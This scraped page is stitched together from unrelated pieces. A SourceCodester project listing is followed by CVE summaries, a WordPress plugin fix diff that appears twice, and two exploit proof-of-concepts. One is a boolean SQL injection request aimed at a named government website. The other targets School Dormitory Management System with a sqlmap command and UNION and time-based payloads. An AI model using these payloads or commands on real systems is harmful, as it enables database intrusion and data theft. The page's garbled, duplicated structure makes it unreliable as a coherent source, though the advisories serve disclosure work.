Stored XSS in Add New Employee Form in Sourcecodester Employee Daily Task Management System 1.0 Allows Remote Attacker to Inject/Store Arbitrary Code via the Name Field.

**Simple Train Ticketing System using C++ with Free Source Code**

6 hours ago By razormist

Simple Train Ticketing System using C++ with Free Source Code The Simple Train Ticketing System with Source Code is a project that can reserve a train ticket. The system is so simple that only contains basic design and functions for reserving a ticket. The purpose of the system is to show customer for how to get a train ticket digitally. About the System The Simple Train Ticketing System was

*   Read more about Simple Train Ticketing System using C++ with Free Source Code
*   Add new comment
*   13 views

**Counting Likes in PHP/OOP Tutorial**

11 hours ago By oretnom23

In this tutorial, I will show the simplest way to **Count Likes of Posts** in **PHP** and **MySQL Database**. Here, you will learn how to join a total count of rows from another table in a query. I will be providing a simple source code of a simple blog application that illustrate our main goal for this tutorial

*   Read more about Counting Likes in PHP/OOP Tutorial
*   Add new comment
*   41 views

**Simple Text Editor App using JavaScript with Free Source Code**

1 day ago By razormist

Simple Text Editor App using JavaScript with Free Source Code Simple Text Editor App with Source Code is a project that can virtually let you manipulate your text content. The application was made so simple that only simple function to show the process of a text editor. The project is a user-friendly kind of system, it is made simple so that it can be easier for you to learn the coding process

*   Read more about Simple Text Editor App using JavaScript with Free Source Code
*   Add new comment
*   81 views

**School Dormitory Management System in PHP/OOP Free Source Code**

2 days ago By oretnom23

Introduction This project is entitled School Dormitory Management System. This is a web-based application project developed in PHP and MySQL Database. This project provides an online and automated platform for Universities or Colleges' Dormitory to manage their monthly collections and records. The system consist consists of multiple features that include the student dorm accounts. The application

*   Read more about School Dormitory Management System in PHP/OOP Free Source Code
*   Add new comment
*   493 views

**Badminton Center Management System in PHP/OOP Free Source Code**

3 days ago By oretnom23

Introduction This project is entitled Badminton Center Management System. This is a web-based application project developed in PHP and MySQL Database. This project provides an online and automated platform for Badminton Centers to manage their daily transactions and records. The system consists of court rentals, sales transactions, and service transaction management. The application was developed

*   Read more about Badminton Center Management System in PHP/OOP Free Source Code
*   Add new comment
*   329 views

**Simple Pet Simulator using Python with Free Source Code**

4 days ago By razormist

Simple Pet Simulator using Python with Free Source Code Simple Pet Simulator with Source Code is a project that can let you pet an animal virtually. The application contains a simple function that only demonstrate the pet action. This application is a user-friendly kind of system that can help beginners to learn new programming knowledge. About the Application The Simple Pet Simulator was

*   Read more about Simple Pet Simulator using Python with Free Source Code
*   Add new comment
*   71 views

**ChatBot App with Suggestion in PHP/OOP Free Source Code**

4 days ago By oretnom23

Introduction This simple project is a ChatBot Application with a Suggestion Feature. This is a web-based application project developed in PHP and MySQL Database. This application is a simple ChatBot Application for any site. I developed this application to give new programmers an idea of how to create a ChatBot Feature for their current or future PHP Projects. This was developed with Bootstrap

*   Read more about ChatBot App with Suggestion in PHP/OOP Free Source Code
*   Add new comment
*   417 views

**Simple Telecom Billing System using C with Free Source Code**

5 days ago By razormist

Simple Telecom Billing System using C with Free Source Code The Simple Telecom Billing System with Source Code is a project that can help you process your telecom bill. The system has a simple function that can input a telecom data and payment. The purpose of the system is to give some convenient way for paying your telecom balance bill. About the System The Simple Telecom Billing System was

*   Read more about Simple Telecom Billing System using C with Free Source Code
*   Add new comment
*   122 views

**Automotive Shop Management System in PHP/OOP Free Source Code**

5 days ago By oretnom23

Introduction This simple project is an Automotive Shop Management System. This is a web-based application project developed in PHP and MySQL Database. This project provides an online platform for Automotive or Car Repair and Services shops to manage their daily transaction. The application also includes an inventory feature that allows the shop management to monitor and manage their product stocks

*   Read more about Automotive Shop Management System in PHP/OOP Free Source Code
*   Add new comment
*   693 views

**Simple Social Networking Site Like Instagram in PHP/OOP Free Source Code**

6 days ago By oretnom23

Introduction This simple project is a Social Networking Site. This is a web-based application project developed in PHP and MySQL Database. This is project is inspired by the famous Instagram Site/Application. The application consists of the most used or common features in a social networking site and of course since this project is inspired by Instagram, posting images is also included. This

*   Read more about Simple Social Networking Site Like Instagram in PHP/OOP Free Source Code
*   Add new comment
*   664 views

**Pagination**

*   Current page 1
*   Page 2
*   Page 3
*   Page 4
*   Page 5
*   Page 6
*   Page 7
*   Page 8
*   Page 9
*   …
*   Next page
*   Last page

Subscribe to

CVE-2021-43712: Free Source Code Projects and Tutorials

Explore CMS v1.0 was discovered to contain a SQL injection vulnerability via a /page.php?id= request.

    # Exploit Title: explore CMS  - Boolean Based SQL Injection# Date: 19/03/2022# Exploit Author: Sajibe Kanti# Vendor Name : EXPLORE IT# Vendor Homepage: https://exploreit.com.bd# CVE: On Request# POC#SQL InjectionSQL injection is a web security vulnerability that allows an attackerto interfere with the queries that an application makes to itsdatabase.explore CMS is vulnerable to the SQL Injection in 'id' parameter ofthe 'page' page.#Steps to reproduceFollowing URL is vulnerable to SQL Injection in the 'id' field.GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1Host: www.gdc.gov.bdAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheCookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320Referer: https://www.gdc.gov.bd/User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36HTTP/1.1 200 OKcontent-encoding:server: LiteSpeedConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/html; charset=UTF-8transfer-encoding: chunkeddate: Thu, 17 Mar 2022 07:27:21 GMTvary: Accept-Encoding10.3.34-MariaDBServer accepts the payload and the response get delayed by 7 seconds.#ImpactAn attcker can compromise the database of the application by manualmethod or by automated tools such as SQLmap.-- ThanksSajibe Kanti

CVE-2022-27412: Explore CMS 1.0 SQL Injection ≈ Packet Storm

A stored cross-site scripting (XSS) vulnerability in PHProjekt PhpSimplyGest v1.3.0 allows attackers to execute arbitrary web scripts or HTML via a project title.

CVE-2022-27308

Craft CMS through 3.7.36 allows a remote unauthenticated attacker, who knows at least one valid username, to reset the account's password and take over the account by providing a crafted HTTP header to the application while using the password reset functionality. Specifically, the attacker must send X-Forwarded-Host to the /index.php?p=admin/actions/users/send-password-reset-email URI. NOTE: the vendor's position is that a customer can already work around this by adjusting the configuration (i.e., by not using the default configuration).

CVE-2022-29933: cms/CHANGELOG.md at develop · craftcms/cms

The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection

Timestamp:

04/08/2022 10:17:35 PM (4 weeks ago)

pluginbazar

Message:

security fixed with $wpdb  

Location:

woc-order-alert/trunk

Files:

  

*   composer.lock
*   includes/class-hooks.php (2 diffs)
*   readme.txt (1 diff)
*   woc-order-alert.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **woc-order-alert/trunk/includes/class-hooks.php**
    
    r2706677
    
    r2707223
    
     
    
    107
    
    107
    
                global $wpdb;
    
    108
    
    108
    
    109
    
     
    
                $all\_orders           = $wpdb->get\_results( "SELECT \* FROM " . OLISTENER\_DATA\_TABLE . " WHERE read\_status = 'unread'" );
    
     
    
    109
    
                $all\_orders           = $wpdb->get\_results(
    
     
    
    110
    
                    $wpdb->prepare( "SELECT \* FROM {$wpdb->prefix}woocommerce\_order\_listener WHERE read\_status = %s", 'unread' )
    
     
    
    111
    
                );
    
     
    
    112
    
                $all\_orders           = ! is\_array( $all\_orders ) ? array() : $all\_orders;
    
    110
    
    113
    
                $order\_list\_items\_all = olistener()->get\_order\_list\_items();
    
    111
    
    114
    
                $order\_list\_items     = olistener()->get\_option( 'olistener\_order\_list\_items', array\_keys( $order\_list\_items\_all ) );
    
    …
    
    …
    
     
    
    192
    
    195
    
    193
    
    196
    
                    $order\_total  = sanitize\_text\_field( olistener()->get\_args\_option( 'total', '', $json\_params ) );
    
    194
    
     
    
                    $all\_orders   = $wpdb->get\_results( "SELECT \* FROM " . OLISTENER\_DATA\_TABLE . " WHERE \`order\_id\` = $order\_id AND \`order\_total\` = $order\_total" );
    
     
    
    197
    
                    $all\_orders   = $wpdb->get\_results(
    
     
    
    198
    
                        $wpdb->prepare( "SELECT \* FROM {$wpdb->prefix}woocommerce\_order\_listener WHERE order\_id = %d", $order\_id )
    
     
    
    199
    
                    );
    
     
    
    200
    
                    $all\_orders   = ! is\_array( $all\_orders ) ? array() : $all\_orders;
    
    195
    
    201
    
                    $latest\_order = end( $all\_orders );
    
    196
    
    202
    
                    $order\_args   = array(
    
*   **woc-order-alert/trunk/readme.txt**
    
    r2706677
    
    r2707223
    
     
    
    7
    
    7
    
        Tested up to: 5.9.3
    
    8
    
    8
    
        Tested up to WooCommerce: 6.3.1
    
    9
    
     
    
        Stable tag: 3.2.0
    
     
    
    9
    
        Stable tag: 3.2.2
    
    10
    
    10
    
        License: GPLv2 or later
    
    11
    
    11
    
        License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
*   **woc-order-alert/trunk/woc-order-alert.php**
    
    r2706677
    
    r2707223
    
     
    
    4
    
    4
    
        Plugin URI: https://pluginbazar.com/
    
    5
    
    5
    
        Description: Play sound as notification instantly on new order in your WooCommerce store
    
    6
    
     
    
        Version: 3.2.1
    
     
    
    6
    
        Version: 3.2.2
    
    7
    
    7
    
        Author: Pluginbazar
    
    8
    
    8
    
        Author URI: https://pluginbazar.com/
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2022-0948: Changeset 2707223 – WordPress Plugin Repository

Timestamp:

04/08/2022 10:17:35 PM (6 weeks ago)

pluginbazar

Message:

security fixed with $wpdb  

Location:

woc-order-alert/trunk

Files:

  

*   composer.lock
*   includes/class-hooks.php (2 diffs)
*   readme.txt (1 diff)
*   woc-order-alert.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **woc-order-alert/trunk/includes/class-hooks.php**
    
    r2706677
    
    r2707223
    
     
    
    107
    
    107
    
                global $wpdb;
    
    108
    
    108
    
    109
    
     
    
                $all\_orders           = $wpdb->get\_results( "SELECT \* FROM " . OLISTENER\_DATA\_TABLE . " WHERE read\_status = 'unread'" );
    
     
    
    109
    
                $all\_orders           = $wpdb->get\_results(
    
     
    
    110
    
                    $wpdb->prepare( "SELECT \* FROM {$wpdb->prefix}woocommerce\_order\_listener WHERE read\_status = %s", 'unread' )
    
     
    
    111
    
                );
    
     
    
    112
    
                $all\_orders           = ! is\_array( $all\_orders ) ? array() : $all\_orders;
    
    110
    
    113
    
                $order\_list\_items\_all = olistener()->get\_order\_list\_items();
    
    111
    
    114
    
                $order\_list\_items     = olistener()->get\_option( 'olistener\_order\_list\_items', array\_keys( $order\_list\_items\_all ) );
    
    …
    
    …
    
     
    
    192
    
    195
    
    193
    
    196
    
                    $order\_total  = sanitize\_text\_field( olistener()->get\_args\_option( 'total', '', $json\_params ) );
    
    194
    
     
    
                    $all\_orders   = $wpdb->get\_results( "SELECT \* FROM " . OLISTENER\_DATA\_TABLE . " WHERE \`order\_id\` = $order\_id AND \`order\_total\` = $order\_total" );
    
     
    
    197
    
                    $all\_orders   = $wpdb->get\_results(
    
     
    
    198
    
                        $wpdb->prepare( "SELECT \* FROM {$wpdb->prefix}woocommerce\_order\_listener WHERE order\_id = %d", $order\_id )
    
     
    
    199
    
                    );
    
     
    
    200
    
                    $all\_orders   = ! is\_array( $all\_orders ) ? array() : $all\_orders;
    
    195
    
    201
    
                    $latest\_order = end( $all\_orders );
    
    196
    
    202
    
                    $order\_args   = array(
    
*   **woc-order-alert/trunk/readme.txt**
    
    r2706677
    
    r2707223
    
     
    
    7
    
    7
    
        Tested up to: 5.9.3
    
    8
    
    8
    
        Tested up to WooCommerce: 6.3.1
    
    9
    
     
    
        Stable tag: 3.2.0
    
     
    
    9
    
        Stable tag: 3.2.2
    
    10
    
    10
    
        License: GPLv2 or later
    
    11
    
    11
    
        License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
*   **woc-order-alert/trunk/woc-order-alert.php**
    
    r2706677
    
    r2707223
    
     
    
    4
    
    4
    
        Plugin URI: https://pluginbazar.com/
    
    5
    
    5
    
        Description: Play sound as notification instantly on new order in your WooCommerce store
    
    6
    
     
    
        Version: 3.2.1
    
     
    
    6
    
        Version: 3.2.2
    
    7
    
    7
    
        Author: Pluginbazar
    
    8
    
    8
    
        Author URI: https://pluginbazar.com/
    

**Note:** See TracChangeset for help on using the changeset viewer.

School Dormitory Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: School Dormitory Management System - 'month' SQL Injection# Date: 08/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Codeline 59 in file "/dms/admin/reports/daily_collection_report.php"$qry = $conn->query("SELECT p.*, a.code, s.code as student_code, concat(s.firstname, ' ', coalesce(concat(s.middlename,' '), ''), s.lastname) as `student`, d.name as dorm, r.name as `room` from payment_list p inner join account_list a on p.account_id = a.id inner join student_list s on a.student_id = s.id inner join room_list r on a.room_id = r.id inner join dorm_list d on r.dorm_id = d.id where (p.month_of) = '{$month}' order by student asc ");# Sqlmap command:sqlmap -u "http://localhost/dms/admin/?month=1&page=reports/daily_collection_report" -p month --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: month (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: month=1' AND (SELECT 3271 FROM (SELECT(SLEEP(5)))duQT) AND 'NgBP'='NgBP&page=reports/daily_collection_report    Type: UNION query    Title: Generic UNION query (NULL) - 11 columns    Payload: month=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6a71,0x485362486f7266597a444d417754744873427366706c4a4f706b7949467a6a61505468424c476753,0x716b6a7171),NULL,NULL,NULL,NULL-- -&page=reports/daily_collection_report

Tag

#php